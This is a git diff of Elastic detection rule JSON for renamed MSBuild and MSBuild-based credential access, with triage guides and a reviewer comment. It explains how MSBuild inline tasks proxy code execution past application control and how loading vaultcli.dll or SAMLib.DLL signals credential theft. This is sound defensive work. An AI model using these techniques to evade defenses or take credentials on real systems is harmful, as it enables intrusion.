Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json
index a42cde7dc7a..7f6ca358dc5 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json
index 0f6d77720ed..6f55329fe19 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { 
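Review bot: The rewritten note tells the analyst the rule "checks for renamed instances of MSBuild" but never says what the check keys on, and the query shown in the hunk's context lines is only `process.pe.original_file_name == "MSBuild.exe"` with `process.name` not matching, so a copy whose PE version resource was stripped or edited produces no alert at all, and to my reading `==` on that field is an exact, case-sensitive comparison in EQL unlike the case-insensitive `:` used for `process.name`. Suggest adding one sentence after the "This rule checks for renamed instances of MSBuild" paragraph in the `note` string, e.g. `This check relies on the PE version resource: a copy with a stripped or altered OriginalFileName will not match, so treat a miss as absence of evidence rather than proof the binary is genuine.` This is a documentation-only change; the enclosing JSON object continues outside the hunk.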
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json
index e9755b5007d..e7f9f3e8a8e 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. 
